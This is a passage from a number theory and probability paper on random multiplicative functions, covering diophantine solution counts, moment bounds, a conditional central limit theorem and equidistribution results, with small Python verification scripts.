and then there are only $O(N^{3/2})$ possibilities for the couple $(a,d)$. Now, $b$ and $c$ should be divisors of $a(a+1)d(d+1) = O(N^4)$, and by the classical divisor bound, we deduce that there are $O(N^{\epsilon})$ possibilities for $(b,c)$ when $a$ and $d$ are chosen.
Hence, the number of solutions for $\delta > \sqrt{N}$ is bounded by the estimate we have claimed.
It remains to bound the number of solutions for $\delta \leq \sqrt{N}$.
We need
$$A^2 - 2(2 \delta +1) AD + D^2 + 4 \delta (\delta +1 ) = (B-C)^2,$$
i.e.
$$[D - (2 \delta + 1)A]^2 + 4 \delta (\delta +1 )
= 4\delta(\delta + 1) A^2 + (B-C)^2.$$
We know that $D \geq A (2 \delta +2)$, and then $0 < D - (2 \delta + 1)A \leq D = O(N)$, which gives, for each value of $\delta$,
$O(N)$ possibilities for $D - (2\delta +1)A$. For the moment, let us admit that for each of these possibilities, there are $O(N^{\epsilon})$ choices for $B-C$ and $A$. Then, for fixed $\delta$, we have
$O (N^{1+ \epsilon})$ choices for $(D -
(2\delta +1) A, A, B-C)$. For each choice, $B-C, A, D$ are fixed, and then also $BC = AD - 2 \delta$, and finally $B$ and $C$.
Hence, we have $O(N^{1+\epsilon})$ solutions for each $\delta \leq \sqrt{N}$, and then $O(N^{3/2 + \epsilon})$ solutions by counting all the possible $\delta$.
The claim we have admitted is a consequence of the following fact we will prove now: for $\epsilon > 0$,
the number of representations of $M$ in integers by the quadratic form $X^2 + P Y^2$ is $O(M^{\epsilon})$, uniformly in the strictly positive integer $P$. Indeed,
for such a representation, the ideal
$(X + Y \sqrt{-P})$ should be a divisor of
$(M)$ in the ring of integers $\mathcal{O}_P$ of $\mathbb{Q}[\sqrt{-P}]$, and each such ideal gives at most $6$ couples $(X,Y)$ representing $M$ (two generators of a given ideal differ by a unit, and the number of units in the ring of integers of an imaginary quadratic field is at most $6$). It is then sufficient to bound the number of divisors of $(M)$ in
$\mathcal{O}_P$ by $O(M^{\epsilon})$, uniformly in $P$. The number of divisors of $(M)$ is $\prod_{\mathfrak{p}} (v_\mathfrak{p}(M) + 1)$, where we have the prime ideal decomposition
$$(M) = \prod_{\mathfrak{p}} \mathfrak{p}^
{v_\mathfrak{p}(M)}.$$
Now, by considering the decomposition of prime numbers as products of ideals, we deduce:
$$(M) = \prod_{p \in \mathcal{P}, \, p \operatorname{inert}} (p)^{v_p(M)}
\prod_{p \in \mathcal{P}, \, p \operatorname{ramified}} \mathfrak{p}_p^{2 v_p(M)}
\prod_{p \in \mathcal{P}, \, p \operatorname{split}} \mathfrak{p}_p^{ v_p(M)} \overline{\mathfrak{p}_p}^{\, v_p(M)},
$$
$\mathfrak{p}_p$ denoting an ideal of norm $p$, and then the number of divisors of $(M)$ is
$$\prod_{p \in \mathcal{P}, \, p \operatorname{inert}} (v_p(M) + 1)
\prod_{p \in \mathcal{P}, \, p \operatorname{ramified}} (2 v_p(M) + 1)
\prod_{p \in \mathcal{P}, \, p \operatorname{split}} (v_p(M) + 1)^2
\leq \prod_{p \in \mathcal{P}}
(v_p(M) + 1)^2 = [\tau(M)]^2,
$$
where $\tau(M)$ is the number of divisors, in the usual sense,
of the integer $M$. This gives the desired bound $O(M^{\epsilon})$.
\end{proof}
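The counting identity of the proposition can be checked by brute force for small $N$; the following sketch is our own verification code, not part of the paper, and computes both sides of the identity independently:

```python
def g(n):
    return n * (n + 1)

def counts(N):
    """Total solution count, N(N) and N_=(N) for the equation g(a)g(d) = g(b)g(c)."""
    total = sum(1 for a in range(1, N + 1) for b in range(1, N + 1)
                for c in range(1, N + 1) for d in range(1, N + 1)
                if g(a) * g(d) == g(b) * g(c))
    strict = sum(1 for a in range(1, N + 1) for b in range(a + 1, N + 1)
                 for c in range(b + 1, N + 1) for d in range(c + 1, N + 1)
                 if g(a) * g(d) == g(b) * g(c))            # N(N): 0 < a < b < c < d
    equal = sum(1 for a in range(1, N + 1) for b in range(a + 1, N + 1)
                for d in range(b + 1, N + 1)
                if g(a) * g(d) == g(b) ** 2)               # N_=(N): 0 < a < b = c < d
    return total, strict, equal

for N in (8, 12, 15):
    total, s, e = counts(N)
    assert total == 2 * N * N - N + 8 * s + 4 * e  # identity of the proposition
```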
\begin{remark}
Using the previous proof, one can show the following quite curious property: all the solutions of $a(a+1) d(d+1) = b(b+1) c (c+1)$ in integers $0 < a < b \leq c < d$ satisfy $d/a > 3 + 2 \sqrt{2}$. Indeed, let us assume the contrary. With the previous notation, $3 + 2 \sqrt{2} \geq d/a \geq D/A
> 2 \delta + 2$, and then $\delta = 1$, which gives $A^2 - 6AD + D^2 + 8 \geq 0$,
i.e.
$$(2a + 1)^2 - 6(2a+1)(2d+1) + (2d+1)^2
+ 8 \geq 0,$$
$$ 4 (a^2 - 6 ad + d^2) - 8a - 8d + 4 \geq 0,$$
a contradiction since $1 < d/a \leq 3 + 2 \sqrt{2}$ implies $a^2 - 6ad + d^2 \leq 0$.
The bound $3+2 \sqrt{2}$ is sharp, since we have the solutions of the form
$(u_{2k}, u_{2k+1}, u_{2k+1}, u_{2k+2})$, where
$$u_r := \frac{(1+\sqrt{2})^{r}
+ (1 - \sqrt{2})^{r} - 2}{4}.$$
\end{remark}
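These extremal solutions can be verified directly; the sketch below (our code, using the integer recurrence $v_r = 2v_{r-1} + v_{r-2}$ for $v_r = (1+\sqrt{2})^r + (1-\sqrt{2})^r$) checks the first few members of the family and the convergence of $d/a$ to $3 + 2\sqrt{2}$:

```python
def u(r):
    # u_r = ((1+sqrt(2))^r + (1-sqrt(2))^r - 2)/4, computed exactly via
    # v_r = (1+sqrt(2))^r + (1-sqrt(2))^r, v_0 = v_1 = 2, v_r = 2 v_{r-1} + v_{r-2}
    v = [2, 2]
    while len(v) <= r:
        v.append(2 * v[-1] + v[-2])
    return (v[r] - 2) // 4

def g(n):
    return n * (n + 1)

for k in range(1, 8):
    a, b, d = u(2 * k), u(2 * k + 1), u(2 * k + 2)
    assert 0 < a < b < d
    assert g(a) * g(d) == g(b) ** 2           # solution with b = c
assert abs(u(14) / u(12) - (3 + 2 * 2 ** 0.5)) < 1e-3  # ratio d/a near 3 + 2 sqrt(2)
```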
The previous proposition yields bounds on all the moments of order between $0$ and $4$:
\begin{corollary}
We have, for all $q \in [0,2]$,
$$c_q + o(1) \leq \mathbb{E} \left[ \left| \frac{1}{\sqrt{N}} \sum_{n=1}^N X_n X_{n+1} \right|^{2q} \right] \leq C_q + o(1),$$
where $c_q = 2^{-(q-1)_{-}} \geq 1/2$ and
$C_q = 2^{(q-1)_{+}} \leq 2$.
\end{corollary}
\begin{proof}
This result is a direct consequence of the
previous estimates for $q = 1$ and $q = 2$ and H\"older's inequality.
\end{proof}
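To make the interpolation explicit, here is a sketch of the H\"older argument behind the constants $c_q$ and $C_q$ (the shorthand $Z_N := N^{-1/2} \sum_{n=1}^N X_n X_{n+1}$ is ours, so that $\mathbb{E}[|Z_N|^2] = 1$ and $\mathbb{E}[|Z_N|^4] = 2 + o(1)$); the remaining bounds, $\mathbb{E}[|Z_N|^{2q}] \leq 1$ for $q \leq 1$ and $\geq 1$ for $q \geq 1$, follow from Jensen's inequality:

```latex
% For q in [1,2], Hoelder's inequality with exponents 1/(2-q), 1/(q-1) gives
$$\mathbb{E}\left[|Z_N|^{2q}\right]
  = \mathbb{E}\left[|Z_N|^{2(2-q)} \, |Z_N|^{4(q-1)}\right]
  \leq \left(\mathbb{E}\left[|Z_N|^{2}\right]\right)^{2-q}
       \left(\mathbb{E}\left[|Z_N|^{4}\right]\right)^{q-1}
  = 2^{q-1} + o(1),$$
% while for q in [0,1], applying the same inequality to the decomposition
% |Z_N|^2 = (|Z_N|^{2q})^{1/(2-q)} (|Z_N|^{4})^{(1-q)/(2-q)} yields
$$1 = \mathbb{E}\left[|Z_N|^{2}\right]
  \leq \left(\mathbb{E}\left[|Z_N|^{2q}\right]\right)^{1/(2-q)}
       \left(2 + o(1)\right)^{(1-q)/(2-q)},
  \quad \text{hence} \quad
  \mathbb{E}\left[|Z_N|^{2q}\right] \geq 2^{-(1-q)} + o(1).$$
```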
We have proven, for the moments of order $4$, the same equivalent as for sums of i.i.d. variables with the same law as $X_n X_{n+1}$. This suggests that there are "more chances" for a central limit theorem to hold than for the sums $\sum_{n=1}^N X_n$ discussed before. Indeed, we have the following:
\begin{proposition}
If for all integers $q \geq 1$, the number of non-trivial solutions
$(n_1, \dots, n_{2q}) \in \{1, \dots, N\}^{2q}$ of the diophantine equation
$$\prod_{r=1}^q n_r(n_r+1)
= \prod_{r=1}^q n_{q+r} (n_{q+r} + 1)$$
is negligible with respect to the number of trivial solutions when $N \rightarrow \infty$ (i.e. is $o(N^q)$), then we have the convergence in distribution
$$ \frac{1}{\sqrt{N}} \sum_{n=1}^{N} X_n X_{n+1} \underset{N \rightarrow \infty}{\longrightarrow} \mathcal{N}_{\mathbb{C}},$$
where $\mathcal{N}_{\mathbb{C}}$ denotes a standard Gaussian complex variable, i.e.
$(\mathcal{N}_1 + i \mathcal{N}_2)/\sqrt{2}$ where $\mathcal{N}_1, \mathcal{N}_2$ are independent standard real Gaussian variables.
\end{proposition}
\begin{proof}
If $$Y_N := \frac{1}{\sqrt{N}} \sum_{n=1}^{N} X_n X_{n+1},$$
then for integers $q_1, q_2 \geq 0$,
the moment $\mathbb{E}[Y_N^{q_1} \overline{Y_N}^{\, q_2}]$ is equal to $N^{-(q_1+ q_2)/2}$ times the number of solutions
$(n_1, \dots, n_{q_{1} + q_2}) \in \{1, \dots, N\}^{q_1 + q_2}$ of
$$\prod_{r=1}^{q_1} n_r(n_r+1)
= \prod_{r=1}^{q_2} n_{q_1+r} (n_{q_1+r} + 1).$$
If exactly one of $q_1$ and $q_2$ vanishes, there is no solution (one side of the equation is an empty product equal to $1$, while the other is at least $2$), so the moment is zero. If $0 < q_1 < q_2$, there are at most $N^{q_1}$ choices for $n_1, \dots, n_{q_1}$, and once these integers are fixed, at most $N^{o(1)}$ choices for $n_{q_1+1}, \dots, n_{q_1+q_2}$ by the divisor bound. Hence, the moment tends to zero when $N \rightarrow \infty$, and the same conclusion holds for $0 < q_2 < q_1$. Finally, if $0 < q_1 = q_2 = q$, by assumption, the moment is equivalent to $N^{-q}$ times the number of trivial solutions of the corresponding diophantine equation, i.e. to the corresponding moment for sums of i.i.d. variables, uniform on the unit circle. By the central limit theorem,
$$\mathbb{E}[|Y_N|^{2q} ] \underset{N \rightarrow \infty}{\longrightarrow}
\mathbb{E}[|\mathcal{N}_{\mathbb{C}}|^{2q}].$$
We have then proven that for all integers $q_1, q_2 \geq 0$,
$$\mathbb{E}[Y_N^{q_1} \overline{Y_N}^{\, q_2} ] \underset{N \rightarrow \infty}{\longrightarrow}
\mathbb{E}[\mathcal{N}_{\mathbb{C}}^{q_1} \overline{\mathcal{N}_{\mathbb{C}}}^{\, q_2} ],$$
which gives the claim.
\end{proof}

We have proven the assumption of the previous proposition for $q \in \{1,2\}$; however, our method does not generalize to larger values of $q$. The divisor bound immediately gives a domination by $N^{q + o(1)}$ for the number of solutions, and it then seems reasonable to expect that the arithmetic constraints implied by the equation are sufficient to save at least a small power of $N$. Note that this saving is not possible for the sums $\sum_{n=1}^N
X_n$, which explains the different behavior.
The previous proposition giving a "conditional CLT" can be generalized to the sums of the form
$$\sum_{n=1}^N \prod_{j=1}^k X_{n + j}^{m_j},$$
when the $m_j$'s have the same sign. The situation is more difficult if the $m_j$'s have different signs since the divisor bound alone does not directly give a useful bound on the number of solutions.
\section{Convergence of the empirical measure in the case of roots of unity} \label{uniform2q}
Here, we suppose that $(X_p)_{p \in \mathcal{P}}$ are i.i.d. uniform on the set
$\mathbb{U}_q$ of $q$-th roots of unity, $q\geq 1$ being fixed. With the notation of the previous section, we now get:
\begin{proposition} \label{qboundL2}
Let $m_1, \dots, m_k$ be integers, not all
divisible by $q$, let $\epsilon > 0$ and let $N > N' \geq 0$. Then,
$$\mathbb{E} \left[
\left|\sum_{n=N'+1}^N \prod_{j=1}^k X_{n+j}^{m_j} \right|^2 \right]
\leq C_{q,k, \epsilon} (N-N') N^{\epsilon}$$
and
$$\mathbb{E} \left[ |\hat{\mu}_{k,N}(m_1, \dots, m_k)|^2
\right] \leq \frac{C_{q,k, \epsilon}}{N^{1-\epsilon}},$$
where $C_{q,k, \epsilon} > 0$ depends only on $q, k, \epsilon$.
\end{proposition}
\begin{proof}
We can obviously assume that $m_1, \dots, m_k$ are between $0$ and $q-1$, which gives finitely many possibilities for these integers, depending only on $q$ and $k$. We can then suppose that $m_1, \dots, m_k$ are fixed at the beginning.
We have to bound the number of couples $(n_1,n_2)$ in $\{N'+1, \dots, N\}^2$ such that
$$\frac{\prod_{j=1}^k (n_1 +j)^{m_j}}{
\prod_{j=1}^k (n_2 +j)^{m_j}} \in
(\mathbb{Q}_+^*)^q,$$
where, in this proof, $(\mathbb{Q}_+^*)^q$ denotes the set of $q$-th powers of positive rational numbers.
Now, any positive integer $r$
can be decomposed as a product of a "smooth" integer whose prime factors are all strictly smaller than $k$,
and a "rough" integer whose prime factors are all larger than or equal to $k$. If
the "rough" integer is denoted $\sharp_k(r)$, the condition just above implies:
$$\frac{\sharp_k \left(\prod_{j=1}^k (n_1 +j)^{m_j}\right)}{
\sharp_k \left(\prod_{j=1}^k (n_2 +j)^{m_j}\right)} \in
(\mathbb{Q}_+^*)^q.$$
Now, the numerator and the denominator of this expression can both be written in a unique way as a product of a $q$-th perfect power and an integer whose $p$-adic valuation is between $0$ and $q-1$ for all $p \in \mathcal{P}$. If the quotient is a $q$-th power, necessarily the numerator and the denominator have the same "$q$-th power free" part. Hence, there exists a $q$-th power free integer $g$ such that
$$\sharp_k \left(\prod_{j=1}^k (n_1 +j)^{m_j}\right), \;
\sharp_k \left(\prod_{j=1}^k (n_2 +j)^{m_j}\right) \in g \mathbb{N}^q,$$
$\mathbb{N}^q$ being the set of $q$-th powers of positive integers.
Hence, the number of couples $(n_1,n_2)$ we have to estimate is bounded by
$$\sum_{g \geq 1, q\operatorname{-th \, power \, free}} [\mathcal{N}(q,k,g,N',N)]^2,
$$
where $\mathcal{N}(q,k,g,N',N)$ is the
number of integers $n \in \{N'+1, \dots, N\}$ such that
$$\sharp_k \left(\prod_{j=1}^k (n +j)^{m_j}\right) \in g \mathbb{N}^q.$$
If a prime number $p \in \mathcal{P}$ divides $n + j$ and $n+j'$ for $j \neq j' \in \{1,\dots, k\}$, it divides $|j-j'|
\in \{1, \dots, k-1\}$, and then $p < k$. Hence, the rough parts of $(n+j)^{m_j}$ are
pairwise coprime. Now, if $g_1, \dots, g_k$ are the $q$-th power free integers such that $\sharp_k[(n+j)^{m_j}] \in g_j \mathbb{N}^q$, we have $g_1 g_2 \dots g_k \in g (\mathbb{Q}_+^*)^q$, and since $g_1, \dots, g_k$ are pairwise coprime, $g_1 g_2 \dots g_k$ is $q$-th power free (like $g$), which implies $g_1 \dots g_k = g$.
Hence
$$\mathcal{N}(q,k,g,N',N)
\leq \sum_{g_1 g_2 \dots g_k = g}
\left| \left\{n \in \{N'+1, \dots N\},
\, \forall j \in \{1, \dots, k\}, \;
\sharp_{k}[(n+j)^{m_j}] \in g_j \mathbb{N}^q \right\} \right|. $$
Let us now fix an index $j_0$ such that $m_{j_0}$ is not a multiple of $q$. We have
$$\mathcal{N}(q,k,g,N',N)
\leq \sum_{g_1 g_2 \dots g_k = g}
\left| \left\{n \in \{N'+1, \dots N\},
\, \sharp_{k}[ (n +j_0)^{m_{j_0}}] \in g_{j_0} \mathbb{N}^q, \forall j \neq j_0, \;
\operatorname{rad}(g_j)|(n+j) \right\} \right|,$$
where $\operatorname{rad}(g_j)$ denotes the product of the prime factors of $g_j$.
The condition on $(n +j_0)^{m_{j_0}}$
means that for all $p \in \mathcal{P}$,
$p \geq k$,
$$m_{j_0} v_p (n+j_0) \equiv v_p (g_{j_0})
\, (\operatorname{mod. } q),$$
i.e. $v_p (g_{j_0})$ is divisible by $\operatorname{gcd}( m_{j_0}, q)$ and
$$(m_{j_0}/ \operatorname{gcd}( m_{j_0}, q)) v_p (n+j_0) \equiv
v_p (g_{j_0})/ \operatorname{gcd}( m_{j_0}, q)\, (\operatorname{mod. } \rho_{j_0}),$$
where $\rho_{j_0} := q/ \operatorname{gcd}( m_{j_0}, q) $. Since $m_{j_0}/ \operatorname{gcd}( m_{j_0}, q)$ is coprime
with $\rho_{j_0}$, the last congruence is
equivalent to a congruence modulo $\rho_{j_0}$ between $v_p(n+j_0)$ and a fixed integer, which is not divisible by
$\rho_{j_0}$ if and only if $p$ divides
$g_{j_0}$. We deduce that the
condition on $(n+j_0)^{m_{j_0}}$ implies that $\sharp_k (n+j_0) \in h(q,m_{j_0},g_{j_0}) \mathbb{N}^{\rho_{j_0}}$, i.e.
$$n+j_0 = \alpha h(q,m_{j_0},g_{j_0})
A^{\rho_{j_0}},$$
where $\alpha$ is a $\rho_{j_0}$-th power
free integer whose prime factors are strictly smaller than $k$, $A$ is an integer and $h(q,m_{j_0},g_{j_0})$
is an integer depending only on $q$, $m_{j_0}$ and $g_{j_0}$, which is divisible by
$\operatorname{rad} (g_{j_0})$.
For a fixed value of $\alpha$, the
values of $A$ should be in the interval
$$I = \left( \big((N' +j_0)/[\alpha h(q,m_{j_0}, g_{j_0})] \big)^{1/\rho_{j_0}},
\big((N +j_0)/[\alpha h(q,m_{j_0}, g_{j_0})] \big)^{1/\rho_{j_0}} \right],$$
whose size is at most
$$ [\operatorname{rad}(g_{j_0})]^{-1/\rho_{j_0}} [(N+j_0)^{1/\rho_{j_0}} -
(N'+j_0)^{1/\rho_{j_0}} ]
\leq 1+ \left(\frac{N - N'}{\operatorname{rad}(g_{j_0})} \right)^{1/2},
$$
by the concavity of the power $1/\rho_{j_0}$ and the fact that $\rho_{j_0}
\geq 2$ (because $m_{j_0}$ is not divisible by $q$), which implies
$x^{1/\rho_{j_0}} \leq 1 + \sqrt{x}$.
Now, the conditions on $n+j$ for $j \neq j_0$ imply a condition of congruence
for $\alpha h (q, m_{j_0}, g_{j_0}) A^{\rho_{j_0}}$, modulo all the primes dividing one of the $g_j$'s for $j \neq j_0$. These primes do not divide $\alpha$, since $\alpha$ has all its prime factors smaller than $k$, whereas $g_j$ divides $\sharp_k[(n + j)^{m_j}]$. They also do not divide $h (q, m_{j_0}, g_{j_0})$,
since this integer has the same prime factors as $g_{j_0}$, which is coprime to $g_j$.
Hence, we get a condition of congruence
for $A^{\rho_{j_0}}$ modulo all primes dividing $g_j$ for some $j \neq j_0$.
For each of these primes, this gives
at most $\rho_{j_0} \leq q$ congruence classes, and then, by the Chinese remainder theorem, we get at most $q^{\omega\left(\prod_{j \neq j_0}
g_j\right)}$ classes modulo
$\prod_{j \neq j_0} \operatorname{rad}(g_j)$, where $\omega$ denotes the number of prime factors of an integer.
The number of integers $A \in I$ satisfying the congruence conditions is then at most:
$$q^{\omega\left(\prod_{j \neq j_0}
g_j\right)}
\left[ 1 + \frac{1}{\prod_{j \neq j_0}
\operatorname{rad}(g_j)} \left(
1 + \frac{N-N'}{\operatorname{rad}(g_{j_0})}
\right)^{1/2} \right]
\leq [\tau(g)]^{\log q/\log 2}
\left[ 1+ \left(1 + \frac{N - N'}{\operatorname{rad}(g)} \right)^{1/2} \right],$$
where $\tau(g)$ denotes the number of divisors of $g$.
Now, $\alpha$ has prime factors smaller than $k$ and $p$-adic valuations smaller than $q$, which certainly gives $\alpha \leq
(k!)^q$. Hence, by considering all the possible values of $\alpha$, and all the possible $g_1, \dots, g_k$, which must divide $g$, we deduce
$$ \mathcal{N}(q,k,g,N',N)
\leq (k!)^q
[\tau(g)]^{k + (\log q/\log 2)}
\left[2 + \left( \frac{N - N'}{\operatorname{rad}(g)} \right)^{1/2} \right].$$
If $\mathcal{N}(q,k,g,N',N) > 0$, we have necessarily $$g \leq \prod_{j=1}^k (N+j)^{m_j} \leq (N+k)^{kq}
\leq (1+k)^{kq} N^{kq}.$$ Using the divisor bound, we deduce that for all $\epsilon > 0$, there exists $C^{(1)}_{q,k,
\epsilon}$ such that for all $g \leq
(1+k)^{kq} N^{kq}$,
$$2 (k!)^q
[\tau(g)]^{k + (\log q/\log 2)}
\leq C^{(1)}_{q,k,
\epsilon} N^{\epsilon},$$
and then
$$\mathcal{N}(q,k,g,N',N)
\leq C^{(1)}_{q,k,
\epsilon} N^{\epsilon}
\left[ 1 + \left( \frac{N - N'}{\operatorname{rad}(g)} \right)^{1/2} \right],$$
i.e.
$$\left(\mathcal{N}(q,k,g,N',N)
- C^{(1)}_{q,k,
\epsilon} N^{\epsilon}
\right)_+ \leq C^{(1)}_{q,k,
\epsilon} N^{\epsilon}
(N - N')^{1/2} (\operatorname{rad}(g))^{-1/2}.$$
Summing the square of this bound for all possible $g$ gives
$$\sum_{g \geq 1, q\operatorname{-th \, power \, free}} \left(\mathcal{N}(q,k,g,N',N)
- C^{(1)}_{q,k,
\epsilon} N^{\epsilon}
\right)^2_+
\leq \left(C^{(1)}_{q,k,
\epsilon}\right)^2 N^{2 \epsilon} (N-N')
\sum_{g \geq 1, q\operatorname{-th \, power \, free}}
\frac{\mathds{1}_{g \leq (1+k)^{kq} N^{kq}}}{\operatorname{rad}(g)}.$$
Now, since all numbers up to
$(1+k)^{kq}N^{kq}$ have prime factors smaller than this quantity, we deduce, using the multiplicativity of the radical:
\begin{align*}\sum_{g \geq 1, q\operatorname{-th \, power \, free}}
\frac{\mathds{1}_{g \leq (1+k)^{kq} N^{kq}}}{\operatorname{rad}(g)}
& \leq \prod_{p \in \mathcal{P},
p \leq (1+k)^{kq}N^{kq}} \left(
\sum_{j=0}^{q-1} \frac{1}{\operatorname{rad} (p^j)} \right)
\\ & \leq \prod_{p \in \mathcal{P},
p \leq (1+k)^{kq}N^{kq}} \left(
1 + \frac{q-1}{p} \right) \,
\leq \prod_{p \in \mathcal{P},
p \leq (1+k)^{kq}N^{kq}} \left(
1 - \frac{1}{p} \right)^{1-q}
\end{align*}
which, by Mertens' theorem, is smaller
than a constant, depending on $k$ and $q$,
times $\log^{q-1}(1+ N)$.
We deduce that there exists a constant
$C^{(2)}_{q,k,\epsilon} >0$, such that
$$\sum_{g \geq 1, q\operatorname{-th \, power \, free}} \left(\mathcal{N}(q,k,g,N',N)
- C^{(1)}_{q,k,
\epsilon} N^{\epsilon}
\right)^2_+
\leq C^{(2)}_{q,k,\epsilon}
N^{3\epsilon} (N-N').$$
Now, it is clear that
$$\sum_{g \geq 1, q\operatorname{-th \, power \, free}}\mathcal{N}(q,k,g,N',N)
= N-N',$$
since this sum counts all the integers $n$
from $N'+1$ to $N$, grouped according to
the $q$-th power free part of
$\sharp_k\left( \prod_{j=1}^k (n+j)^{m_j}
\right)$.
Using the inequality $x^2 \leq (x-a)_+^2 + 2ax$, valid for all $a, x \geq 0$, we deduce
$$\sum_{g \geq 1, q\operatorname{-th \, power \, free}}[\mathcal{N}(q,k,g,N',N)]^2
\leq C^{(2)}_{q,k,\epsilon}
N^{3\epsilon} (N-N') +
2 C^{(1)}_{q,k,
\epsilon} N^{\epsilon} (N-N').$$
This result gives the first inequality of the proposition, for
$$C_{q,k,\epsilon}
= C^{(2)}_{q,k,\epsilon/3}
+ 2C^{(1)}_{q,k,\epsilon/3}.$$
The second inequality is obtained by taking $N' = 0$ and dividing by $N^2$.
\end{proof}
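The smooth/rough decomposition at the heart of this proof can be tested on small parameters. The sketch below (our own code; the function names are hypothetical) computes the rough part $\sharp_k(r)$ and the $q$-th power free part, and checks the two structural facts used above: the multiplicativity $g = g_1 \cdots g_k$ coming from the pairwise coprimality of the rough parts, and the fact that the classes $g$ partition $\{1, \dots, N\}$:

```python
from collections import Counter

def sharp(r, k):
    """Rough part of r: remove all prime factors < k."""
    for p in range(2, k):
        while r % p == 0:
            r //= p
    return r

def qfree(r, q):
    """q-th-power-free part of r."""
    g, p = 1, 2
    while p * p <= r:
        e = 0
        while r % p == 0:
            r //= p
            e += 1
        g *= p ** (e % q)
        p += 1
    return g * r ** (1 % q)  # leftover r is 1 or a prime of exponent 1

q, k, N = 2, 3, 100
m = (1, 1, 1)  # exponents m_1, ..., m_k, not all divisible by q

classes = Counter()
for n in range(1, N + 1):
    prod, prod_g = 1, 1
    for j in range(1, k + 1):
        prod *= (n + j) ** m[j - 1]
        prod_g *= qfree(sharp((n + j) ** m[j - 1], k), q)
    g = qfree(sharp(prod, k), q)
    assert g == prod_g  # rough parts of the (n+j)^{m_j} are pairwise coprime
    classes[g] += 1
assert sum(classes.values()) == N  # the classes g partition {1, ..., N}
```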
\begin{corollary}
For all $(m_1, \dots, m_k) \in \mathbb{Z}^k$, $\hat{\mu}_{k,N}(m_1, \dots, m_k)$ converges
in $L^2$, and then in probability, to the corresponding Fourier coefficient of the uniform distribution $\mu_{k,q}$ on $\mathbb{U}_q^k$. In other words, $\mu_{k,N}$ converges weakly in probability to $\mu_{k,q}$.
\end{corollary}
We also have a strong law of large numbers.
\begin{proposition}
Almost surely, $\mu_{k,N}$ weakly converges to $\mu_{k,q}$. More precisely, for all $(t_1, \dots, t_k) \in (\mathbb{U}_q)^k$, the proportion of $n \leq N$ such that
$(X_{n+1}, \dots, X_{n+k}) = (t_1, \dots, t_k)$ is almost surely $q^{-k} + O(N^{-1/2 + \epsilon})$ for all $\epsilon > 0$.
\end{proposition}
\begin{proof}
By Lemma \ref{lemmaLLN} and Proposition
\ref{qboundL2}, we deduce that almost surely, for all $\epsilon > 0$,
$0 \leq m_1, \dots, m_k \leq q-1$,
$(m_1, \dots, m_k) \neq (0,0, \dots, 0)$,
$$\hat{\mu}_{k,N}(m_1, \dots, m_k)
= O( N^{-1/2 + \epsilon}).$$
Since there are finitely many values of $m_1, \dots, m_k$, we can take the $O$ uniform in $m_1, \dots, m_k$. Then, by inverting the discrete Fourier transform on $\mathbb{U}_q^k$, we deduce the claim.
\end{proof}
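This almost sure equidistribution of patterns is easy to observe in simulation. The following sketch (our illustration, not part of the proof) draws i.i.d. signs $X_p$ on the primes for $q = 2$, extends them multiplicatively via a smallest-prime-factor sieve, and checks that each of the $q^k = 4$ patterns $(X_{n+1}, X_{n+2})$ has frequency close to $1/4$; the tolerance $0.05$ is a deliberately generous margin compared with the expected $N^{-1/2+\epsilon}$ fluctuations:

```python
import random
from collections import Counter

random.seed(0)
N = 200000

# smallest-prime-factor sieve up to N + k (here k = 2)
spf = list(range(N + 3))
for p in range(2, int((N + 2) ** 0.5) + 1):
    if spf[p] == p:
        for multiple in range(p * p, N + 3, p):
            if spf[multiple] == multiple:
                spf[multiple] = p

# X_p i.i.d. uniform on {+1, -1} (q = 2), extended multiplicatively
eps = {}
X = [0] * (N + 3)
X[1] = 1
for n in range(2, N + 3):
    p = spf[n]
    if p not in eps:
        eps[p] = random.choice([-1, 1])
    X[n] = eps[p] * X[n // p]

patterns = Counter((X[n + 1], X[n + 2]) for n in range(1, N + 1))
assert len(patterns) == 4
for count in patterns.values():
    assert abs(count / N - 0.25) < 0.05  # frequency close to q^{-k} = 1/4
```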
\section{More general distributions on the unit circle} \label{general}
In this section, $(X_p)_{p \in \mathcal{P}}$ are i.i.d., with any distribution on the unit circle. We will study the empirical distribution of $(X_n)_{n \geq 1}$, but not of the patterns $(X_{n+1}, \dots, X_{n+k})_{n \geq 1}$ for $k \geq 2$.
More precisely, the goal of the section is to prove a strong law of large numbers for $N^{-1} \sum_{n=1}^N \delta_{X_n}$ when $N$ goes to infinity. We will use the following result, due to Hal\'asz, Montgomery and Tenenbaum (see \cite{GS}, \cite{M}, \cite{Te} p. 343):
\begin{proposition} \label{HMT}
Let $(Y_n)_{n \geq 1}$ be a multiplicative function such that $|Y_n| \leq 1$ for all $n \geq 1$. For $N \geq 3, T > 0$, we set
$$M(N,T) := \underset{|\lambda| \leq 2T} {\min}
\sum_{p \in \mathcal{P}, p \leq N}
\frac{1 - \Re (Y_p p^{-i\lambda})}{p}.$$
Then:
$$\left|\frac{1}{N} \sum_{n=1}^N Y_n \right|
\leq C \left[(1 + M(N,T)) e^{- M(N,T) } + T^{-1/2} \right],$$
where $C > 0$ is an absolute constant.
\end{proposition}
From this result, we show the following:
\begin{proposition}
Let $(Y_n)_{n \geq 1}$ be a random multiplicative function such that $(Y_p)_{p \in \mathcal{P}}$ are i.i.d., with $\mathbb{P} [|Y_p| \leq 1] = 1$ and $\mathbb{P} [Y_p = 1] < 1$. Then, almost surely,
for all $c \in (0, 1 - \mathbb{E}[\Re(Y_2)])$,
$$\frac{1}{N} \sum_{n=1}^N Y_n
= O((\log N)^{-c}).$$
\end{proposition}
\begin{proof}
First, we observe that for $1 < N' < N$ integers, $\lambda > 0$,
$$\sum_{p \in \mathcal{P}, N' < p \leq N}
p^{-1 - i\lambda} =
\int_{N'}^{N} \frac{d \theta(x)}{x^{1+i \lambda} \log x} = \left[ \frac{\theta(x)}{x^{1+i \lambda} \log x} \right]_{N'}^N
+ \int_{N'}^{N} \left( \frac{(1+i \lambda)}{x^{2 + i \lambda} \log x}
+ \frac{1}{x^{1 + i \lambda} \, x \log^2 x} \right) \theta(x) dx,$$
where, by a classical refinement of the prime number theorem,
$$\theta(x) := \sum_{p \in \mathcal{P},
p \leq x} \log p = x + O_A(x/\log^{A} x)$$
for all $A > 1$.
The bracket is dominated by $1/\log (N')$, the second part of the last integral is dominated by
$$\int_{N'}^{\infty} \frac{dx}{x \log^2 x} = \int_{\log N'}^{\infty} \frac{dy}{y^2} = 1/\log (N'),$$
and the error term of the first part is dominated by $(1+\lambda)/ \log^{A} (N')$. Hence
$$\sum_{p \in \mathcal{P}, N' < p \leq N} p^{-1-i\lambda}= I_{N',N, \lambda} + O_A \left( \frac{1}{\log N'} +
\frac{\lambda}{ \log^{A} N'} \right),$$
where
